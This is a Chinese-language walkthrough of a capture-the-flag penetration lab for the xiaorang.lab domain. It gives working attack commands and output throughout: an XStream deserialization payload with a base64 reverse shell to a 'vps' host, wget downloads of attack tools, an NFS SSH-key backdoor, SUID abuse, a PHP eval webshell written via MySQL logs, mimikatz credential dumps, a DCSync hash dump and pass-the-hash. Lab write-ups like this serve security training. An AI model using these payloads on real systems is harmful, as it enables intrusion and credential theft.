目录

flag1

fscan64 -h 39.98.117.253

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.117.253   is alive
[*] Icmp alive hosts len is: 1
39.98.117.253:80 open
39.98.117.253:21 open
39.98.117.253:22 open
39.98.117.253:8080 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.98.117.253      code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[+] ftp://39.98.117.253:21:anonymous
   [->]1.txt
   [->]pom.xml
[*] WebTitle: http://39.98.117.253:8080 code:200 len:3655   title:公司发货单
已完成 4/4
[*] 扫描结束,耗时: 38.6700939s

ftp匿名登录

image-20231005152241214

1.txt是空的,pom.xml

<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.2</version>
<relativePath/>
<!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>ezjava</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>ezjava</name>
<description>ezjava</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>

可以打XStream CVE-2021-29505和cc5

打8080端口 image-20231005152429407

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections5 "bash -c {echo,YmFzaCA...0IDA+JjE=}|{base64,-d}|{bash,-i}"
 <java.util.PriorityQueue serialization='custom'>
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage>true</parsedMessage>
                    <soapVersion>SOAP_11</soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized>false</attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string>aa</string>
                                        <string>aa</string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string>UnicastRef</string>
                                                <string>vps</string>
                                                <int>6666</int>
                                                <long>0</long>
                                                <int>0</int>
                                                <long>0</long>
                                                <short>0</short>
                                                <boolean>false</boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host>vps</host>
                                        <port>6666</port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

弹shell拿到flag

image-20231005152948885

flag2

ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.13.14  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe04:251b  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:04:25:1b  txqueuelen 1000  (Ethernet)
        RX packets 109791  bytes 147614543 (147.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 23683  bytes 3702075 (3.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 834  bytes 78279 (78.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 834  bytes 78279 (78.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
wget http://vps:88/fscan
wget http://vps:88/frpc
wget http://vps:88/frpc.ini
chmod +x fscan
./fscan -h 172.22.13.14/24
./fscan -h 172.22.13.14/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.13.14    is alive
(icmp) Target 172.22.13.6     is alive
(icmp) Target 172.22.13.28    is alive
(icmp) Target 172.22.13.57    is alive
[*] Icmp alive hosts len is: 4
172.22.13.14:80 open
172.22.13.57:80 open
172.22.13.28:80 open
172.22.13.57:22 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.6:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.6:88 open
172.22.13.28:3306 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.6:139 open
172.22.13.28:139 open
172.22.13.28:135 open
[*] alive ports len is: 16
start vulscan
[*] WebTitle: http://172.22.13.28       code:200 len:2525   title:欢迎登录OA办公平台
[*] NetInfo:
[*]172.22.13.28
   [->]WIN-HAUWOLAO
   [->]172.22.13.28
[*] WebTitle: http://172.22.13.14       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] WebTitle: http://172.22.13.57       code:200 len:4833   title:Welcome to CentOS
[*] WebTitle: http://172.22.13.28:8000  code:200 len:170    title:Nothing Here.
[*] NetInfo:
[*]172.22.13.6
   [->]WIN-DC
   [->]172.22.13.6
[*] NetBios: 172.22.13.6     [+]DC XIAORANG\WIN-DC          
[*] NetBios: 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393 
[+] ftp://172.22.13.14:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] WebTitle: http://172.22.13.14:8080  code:200 len:3655   title:公司发货单
[+] mysql:172.22.13.28:3306:root 123456
已完成 16/16
[*] 扫描结束,耗时: 16.902366459s

整理一下

172.22.13.14 本机
172.22.13.57 80,22,2049 NFS
172.22.13.28 8000,3306,80 WIN-HAUWOLAO
172.22.13.6 WIN-DC DC

看57那台机子,挂个代理

NFS提权,可以看这篇文章

https://xz.aliyun.com/t/11664#toc-12

apt-get update
apt-get install nfs-common
showmount -e 172.22.13.57
mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock

image-20231005172756339

写rsa后门

ssh-keygen -t rsa -b 4096
cd /tmp/temp/home/joyce/
mkdir .ssh
cp /tmp/id_rsa.pub /tmp/temp/home/joyce/.ssh/
cat id_rsa.pub >> /tmp/temp/home/joyce/.ssh/authorized_keys
ssh  -i id_rsa joyce@172.22.13.57

image-20231005173209214

成功连接,flag没权限拿,但是还有个pAss.txt

xiaorang.lab/zhangwen\QT62f3gBhK1

image-20231005173355121

尝试suid提权

find / -user root -perm -4000 -print 2>/dev/null
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/bin/sudo
/usr/bin/chage
/usr/bin/at
/usr/bin/mount
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/ftp
/usr/bin/umount
/usr/lib/polkit-1/polkit-agent-helper-1

可以利用ftp

image-20231005173726395

172.22.13.14
python3 -m pyftpdlib -p 6666 -u test -P test -w &
172.22.13.57
ftp 172.22.13.14 6666
test
test
put flag02.txt

image-20231005174929540

回到

172.22.13.14
cat /root/flag/flag02.txt

flag3

172.22.13.14 本机
172.22.13.57 80,22,2049 NFS
172.22.13.28 8000,3306,80 WIN-HAUWOLAO
172.22.13.6 WIN-DC DC

查看28那台机器

上面fscan扫到有弱密码,直接navicat连接

root/123456

但是数据库中并没有什么数据,因为是root权限,尝试看能不能写shell

image-20231005182456304

可以发现没有开启,但同时也发现了服务器上安装了phpstudy

命令行开启

set global general_log = "ON";

设置日志路径为网站根目录(这里因为知道使用了phpstudy所以改的默认网站根目录),并把文件格式修改为相应的后缀名

set global general_log_file ='C:/phpstudy_pro/WWW/shell.php';

写入木马

select '<?php eval($_POST[1]);?>';

image-20231005182730112

image-20231005182758756

拿到flag3

flag4

上传个mimikatz

mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" "exit"
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 6535704 (00000000:0063ba18)
Session           : RemoteInteractive from 2
User Name         : zhangwen
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2023/10/5 18:31:22
SID               : S-1-5-21-3269458654-3569381900-10559451-1104
    msv :    
     [00000003] Primary
     * Username : zhangwen
     * Domain   : XIAORANG
     * NTLM     : fa7d776fdfc82d3f43c9d8b7f5312d77
     * SHA1     : 3e568ea10e85b91f95af47b064b713f83682d1ee
     * DPAPI    : 4b3a5a99aa46e26e47ff5fbe2c7e58b4
    tspkg :    
    wdigest :    
     * Username : zhangwen
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : zhangwen
     * Domain   : XIAORANG.LAB
     * Password : (null)
    ssp :    
    credman :    
Authentication Id : 0 ; 6520998 (00000000:006380a6)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 18:31:21
SID               : S-1-5-90-0-2
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : e104c781fe7b3f4a8bcb215097319193
     * SHA1     : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : WIN-HAUWOLAO$
     * Domain   : xiaorang.lab
     * Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72 
    ssp :    
    credman :    
Authentication Id : 0 ; 6516069 (00000000:00636d65)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 18:31:21
SID               : S-1-5-90-0-2
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : e104c781fe7b3f4a8bcb215097319193
     * SHA1     : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : WIN-HAUWOLAO$
     * Domain   : xiaorang.lab
     * Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72 
    ssp :    
    credman :    
Authentication Id : 0 ; 90670 (00000000:0001622e)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2023/10/5 18:10:44
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
    msv :    
     [00000003] Primary
     * Username : chenglei
     * Domain   : XIAORANG
     * NTLM     : 0c00801c30594a1b8eaa889d237c5382
     * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
     * DPAPI    : 89b179dc738db098372c365602b7b0f4
    tspkg :    
    wdigest :    
     * Username : chenglei
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : chenglei
     * Domain   : XIAORANG.LAB
     * Password : Xt61f3LBhg1
    ssp :    
    credman :    
Authentication Id : 0 ; 89589 (00000000:00015df5)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2023/10/5 18:10:44
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
    msv :    
     [00000003] Primary
     * Username : chenglei
     * Domain   : XIAORANG
     * NTLM     : 0c00801c30594a1b8eaa889d237c5382
     * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
     * DPAPI    : 89b179dc738db098372c365602b7b0f4
    tspkg :    
    wdigest :    
     * Username : chenglei
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : chenglei
     * Domain   : XIAORANG.LAB
     * Password : Xt61f3LBhg1
    ssp :    
    credman :    
Authentication Id : 0 ; 52118 (00000000:0000cb96)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:42
SID               : S-1-5-90-0-1
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : b5cd3591a58e1169186bcdbfd4b6322d
     * SHA1     : 226ee6b5e527e5903988f08993a2456e3297ee1f
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : WIN-HAUWOLAO$
     * Domain   : xiaorang.lab
     * Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;`Nfr;;Hf8O'Szfl0Z=w+^,>0jR
    ssp :    
    credman :    
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:42
SID               : S-1-5-20
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : e104c781fe7b3f4a8bcb215097319193
     * SHA1     : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : win-hauwolao$
     * Domain   : XIAORANG.LAB
     * Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72 
    ssp :    
    credman :    
Authentication Id : 0 ; 23506 (00000000:00005bd2)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:42
SID               : 
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : e104c781fe7b3f4a8bcb215097319193
     * SHA1     : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
    tspkg :    
    wdigest :    
    kerberos :    
    ssp :    
    credman :    
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:43
SID               : S-1-5-19
    msv :    
    tspkg :    
    wdigest :    
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos :    
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :    
    credman :    
Authentication Id : 0 ; 52075 (00000000:0000cb6b)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:42
SID               : S-1-5-90-0-1
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : e104c781fe7b3f4a8bcb215097319193
     * SHA1     : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : WIN-HAUWOLAO$
     * Domain   : xiaorang.lab
     * Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72 
    ssp :    
    credman :    
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:42
SID               : S-1-5-18
    msv :    
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : win-hauwolao$
     * Domain   : XIAORANG.LAB
     * Password : (null)
    ssp :    
    credman :    
mimikatz(commandline) # exit
Bye!

chenglei 位于 ACL Admin 组

net user /domain
net user chenglei /domain

image-20231005183631106

那么chenglei这个账号拥有WriteDACL权限

登陆chenglei的远程桌面使用powerview给chenglei账号添加DCSync权限

chenglei/Xt61f3LBhg1

Release Empire 2.5 Release · EmpireProject/Empire (github.com)

Import-Module .\powerview.ps1
Add-DomainObjectAcl -TargetIdentity 'DC=xiaorang,DC=lab' -PrincipalIdentity chenglei -Rights DCSync -Verbose

image-20231005184347246

接着使用mimikatz导出所有域内用户hash

image-20231005184627166

lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'WIN-DC.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  cb976ec1a1bf8a14a15142c6fecc540e        514
1106    zhangtao        e786c4a4987ced162c496d0519496729        512
1000    WIN-DC$ 3e6e01dca4c30872a929cb85407b4e6c        532480
500     Administrator   6341235defdaed66fb7b682665752c9a        512
1105    chenglei        0c00801c30594a1b8eaa889d237c5382        512
1103    WIN-HAUWOLAO$   e104c781fe7b3f4a8bcb215097319193        4096
1104    zhangwen        fa7d776fdfc82d3f43c9d8b7f5312d77        512

最后使用wmiexec hash传递

proxychains impacket-wmiexec -hashes :6341235defdaed66fb7b682665752c9a xiaorang.lab/Administrator@172.22.13.6

image-20231005184849664